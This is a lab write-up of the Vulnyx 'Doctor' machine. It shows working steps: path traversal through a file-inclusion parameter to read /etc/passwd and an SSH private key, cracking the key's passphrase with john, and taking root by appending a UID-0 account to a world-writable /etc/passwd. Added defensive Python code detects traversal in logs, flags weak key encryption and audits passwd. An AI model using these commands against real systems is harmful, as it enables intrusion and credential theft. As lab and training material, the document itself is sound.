Doctor

Target description

https://vulnyx.com/file/Doctor.php

I. Host discovery

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:28 CST
Nmap scan report for 192.168.2.1
Host is up (0.00062s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:02:D6:DC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.44
Host is up (0.00089s latency).
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

IP address: 192.168.2.44

II. Port scanning

1. Full port scan

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap --min-rate 10000 -p- 192.168.2.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:28 CST
Nmap scan report for 192.168.2.44
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds

Open ports: 22 and 80

2. Service and version scan

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:29 CST
Nmap scan report for 192.168.2.44
Host is up (0.0010s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Docmed
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.99 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap -sU --top-ports 100 192.168.2.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:30 CST
Nmap scan report for 192.168.2.44
Host is up (0.00097s latency).
All 100 scanned ports on 192.168.2.44 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)

No UDP ports found open.

III. Web penetration

Browsing port 80 shows that the site is built on a Colorlib template, and the page also reveals a domain name, contact.com.

Add the domain to the hosts file:

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# echo "192.168.2.44 contact.com" >> /etc/hosts

1. Directory brute-forcing

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# gobuster dir -u http://192.168.2.44 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.44
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 39760]
/.php (Status: 403) [Size: 277]
/about.html (Status: 200) [Size: 31341]
/contact.html (Status: 200) [Size: 49539]
/blog.html (Status: 200) [Size: 31455]
/img (Status: 301) [Size: 310] [--> http://192.168.2.44/img/]
/main.html (Status: 200) [Size: 931]
/css (Status: 301) [Size: 310] [--> http://192.168.2.44/css/]
/js (Status: 301) [Size: 309] [--> http://192.168.2.44/js/]
/elements.html (Status: 200) [Size: 39421]
/fonts (Status: 301) [Size: 312] [--> http://192.168.2.44/fonts/]
/Department.html (Status: 200) [Size: 35900]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

Directory brute-forcing against both the IP address and the domain name turned up nothing useful.

2. File inclusion

While browsing the site, the doctor page turned out to have a file inclusion vulnerability (the include parameter of doctor-item.php).

Trying to read /etc/passwd works, and the file reveals a user named admin.

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# curl http://192.168.2.44/doctor-item.php?include=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash

Read admin's SSH private key.

  • First, read authorized_keys
    ┌──(root㉿kali)-[/miao/vulnyx/doctor]
    └─# curl http://192.168.2.44/doctor-item.php?include=../../../../../home/admin/.ssh/authorized_keys
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
  • Then read the private key file id_rsa
    ┌──(root㉿kali)-[/miao/vulnyx/doctor]
    └─# curl http://192.168.2.44/doctor-item.php?include=../../../../../home/admin/.ssh/id_rsa
    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

    -----END RSA PRIVATE KEY-----
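From the defender's side, the requests above leave a clear trace in the web server's access log. The following is an added example, not code from the write-up or from the box, that parses constructed Apache combined-log lines, decodes the include parameter (twice, to catch double encoding) and flags traversal attempts; resolve_include shows the server-side check that would have prevented the read. The log lines, the pages directory and the parameter name are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines modelled on this write-up's requests
# (not real server logs): one benign page load, then three traversal attempts.
SAMPLE_LOG = """\
192.168.2.4 - - [03/Jul/2025:14:40:01 +0800] "GET /doctor-item.php?include=doctor1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.2.4 - - [03/Jul/2025:14:41:12 +0800] "GET /doctor-item.php?include=../../../../../etc/passwd HTTP/1.1" 200 1454 "-" "curl/8.5.0"
192.168.2.4 - - [03/Jul/2025:14:42:30 +0800] "GET /doctor-item.php?include=..%2F..%2F..%2Fhome%2Fadmin%2F.ssh%2Fid_rsa HTTP/1.1" 200 1766 "-" "curl/8.5.0"
192.168.2.4 - - [03/Jul/2025:14:43:05 +0800] "GET /doctor-item.php?include=%252e%252e%2f%252e%252e%2fetc%2fshadow HTTP/1.1" 200 0 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')
# "../" or "..\" anywhere in the value, an absolute path, or an embedded NUL byte
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^/|\x00")

def decode_param(value: str, rounds: int = 2) -> str:
    """Percent-decode until stable (bounded), so %252e%252e%2f ends up as ../ too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_lfi_attempts(log_text: str, param: str = "include") -> list:
    """Return the requests whose `param` value points outside the page directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # parse_qs strips one layer of percent-encoding; decode_param handles the rest
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            value = decode_param(raw)
            if TRAVERSAL_RE.search(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "path": url.path, "value": value})
    return hits

def resolve_include(base_dir: str, requested: str):
    """Server-side fix: resolve the requested page and refuse anything outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decode_param(requested)))
    return target if os.path.commonpath([base, target]) == base else None
```

A 200 status on a flagged request, as in the sample, means the read succeeded and the file should be treated as exposed.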

IV. Cracking the SSH private key passphrase

The private key is passphrase-protected, so the passphrase has to be cracked.

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# ssh2john id_rsa > tmp

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2025-07-03 15:34) 14.28g/s 18285p/s 18285c/s 18285C/s ramona..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The private key passphrase is unicorn.
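Why this cracked so fast: the key uses the legacy PEM container ("Proc-Type: 4,ENCRYPTED" plus a DEK-Info line), whose passphrase is turned into the cipher key by OpenSSL's EVP_BytesToKey with MD5 and count 1 (the "MD5/3DES" cost john printed), so a wordlist runs at tens of thousands of guesses per second; the openssh-key-v1 container with its bcrypt KDF is what ssh-keygen produces today. The check below is an added example, not code from the write-up: it classifies a private key container and flags weak protection, using a constructed legacy sample with placeholder values and a constructed openssh-key-v1 header for comparison. The threshold of 16 rounds is ssh-keygen's default for -a.

```python
import base64
import re
import struct
MAGIC = b"openssh-key-v1\x00"

# Constructed legacy-PEM sample (placeholder IV and body, not the key from the box):
# the classifier only looks at the armor and the PEM headers.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

def _sshstr(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b

def make_openssh_header(cipher: bytes, kdf: bytes, rounds: int = 0) -> str:
    """Build only the leading fields of a constructed openssh-key-v1 blob (no key material)."""
    opts = _sshstr(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    b64 = base64.b64encode(MAGIC + _sshstr(cipher) + _sshstr(kdf) + _sshstr(opts)).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"

def classify_private_key(text: str) -> dict:
    """Report the container format, cipher, KDF and whether the protection is weak."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        raw = base64.b64decode("".join(l for l in text.splitlines() if not l.startswith("-----")))
        if not raw.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off, fields = len(MAGIC), []
        for _ in range(3):  # ciphername, kdfname, kdfoptions: each a uint32 length + bytes
            (n,) = struct.unpack(">I", raw[off:off + 4])
            fields.append(raw[off + 4:off + 4 + n])
            off += 4 + n
        cipher, kdf, opts = fields
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string(salt) || uint32(rounds)
            (salt_len,) = struct.unpack(">I", opts[:4])
            (rounds,) = struct.unpack(">I", opts[4 + salt_len:8 + salt_len])
        weak = cipher == b"none" or (rounds is not None and rounds < 16)  # 16 = ssh-keygen -a default
        return {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "rounds": rounds, "weak": weak}
    if re.search(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", text, re.M):
        # Legacy PEM derives the key with EVP_BytesToKey(MD5, count=1): no real stretching
        dek = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),", text, re.M)
        encrypted = "Proc-Type: 4,ENCRYPTED" in text and dek is not None
        return {"format": "legacy-pem", "cipher": dek.group(1) if encrypted else "none", "weak": True,
                "kdf": "md5-evp-bytes-to-key" if encrypted else "none", "rounds": 1 if encrypted else None}
    raise ValueError("unrecognised private key container")
```

A key that classifies as weak should be re-encrypted in place with ssh-keygen -p -o -a 16 (or higher) and a strong passphrase, which also replaces the legacy container.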

V. Getting user access

Connect directly with the private key, entering the cracked passphrase.

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# ssh admin@192.168.2.44 -i id_rsa
Enter passphrase for key 'id_rsa':
admin@doctor:~$ id
uid=1000(admin) gid=1000(admin) grupos=1000(admin)

USER FLAG

admin@doctor:~$ cat user.txt

VI. Privilege escalation

sudo -l shows that sudo is not even installed (command not found).

admin@doctor:~$ sudo -l
-bash: sudo: orden no encontrada

Write permission on passwd

Checking file permissions shows that /etc/passwd is world-writable (the w bit is set for others).

admin@doctor:/$ ls -la /etc/passwd
-rw----rw- 1 root root 1454 jul 3 09:46 /etc/passwd

Add a user entry with root privileges (UID 0).

  • Use openssl to generate a hash of the password 123456

    admin@doctor:/$ openssl passwd
    Password:
    Verifying - Password:
    cxHZ02OJlqOKA
  • Append it to /etc/passwd

    admin@doctor:/$ echo "miao:cxHZ02OJlqOKA:0:0:root:/root:/bin/bash" >> /etc/passwd

Switch to the new user; it has root privileges.

admin@doctor:/$ su miao
Contraseña:
root@doctor:/# id
uid=0(root) gid=0(root) grupos=0(root)
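The root cause here is a file permission, not a sudo rule, so the check a defender wants is a periodic audit of /etc/passwd. Below is an added example (not from the write-up) that inspects a passwd file's mode bits and its entries: extra UID 0 accounts, hashes stored directly in the second field instead of in /etc/shadow, and shared UIDs. The sample content and its hash string are constructed placeholders; the mode 0o606 mirrors the -rw----rw- shown above.

```python
import os
import stat

# Constructed /etc/passwd excerpt modelled on the box (not the real file): root,
# a service account, the admin user, and an appended UID-0 entry whose second
# field holds a crypt(3)-style hash instead of "x" (the hash is a placeholder).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash
miao:PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""

def audit_passwd(text: str, mode: int) -> list:
    """Return findings for a passwd file's content plus its st_mode permission bits."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("mode %o: passwd is world-writable" % (mode & 0o777))
    elif mode & stat.S_IWGRP:
        findings.append("mode %o: passwd is group-writable" % (mode & 0o777))
    seen_uids = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        # Anything but x/*/! here is either a hash (crackable offline) or an empty password
        if pw not in ("x", "*", "!"):
            findings.append(f"line {lineno}: user {name} has a password hash or empty password in passwd")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: user {name} has UID 0")
        seen_uids.setdefault(uid, []).append(name)
    for uid, names in seen_uids.items():
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings

def audit_passwd_path(path: str = "/etc/passwd") -> list:
    """Run the audit against a file on disk, taking the mode from stat()."""
    with open(path) as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)
```

Run audit_passwd_path() from cron or a configuration-management check; anything other than an empty list is worth an alert.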

ROOT FLAG

root@doctor:~# cat root.txt


Doctor
http://miao-sec.github.io/Vulnyx/Doctor/
Author: Miao
Published: 3 July 2025
License: BY-MIAO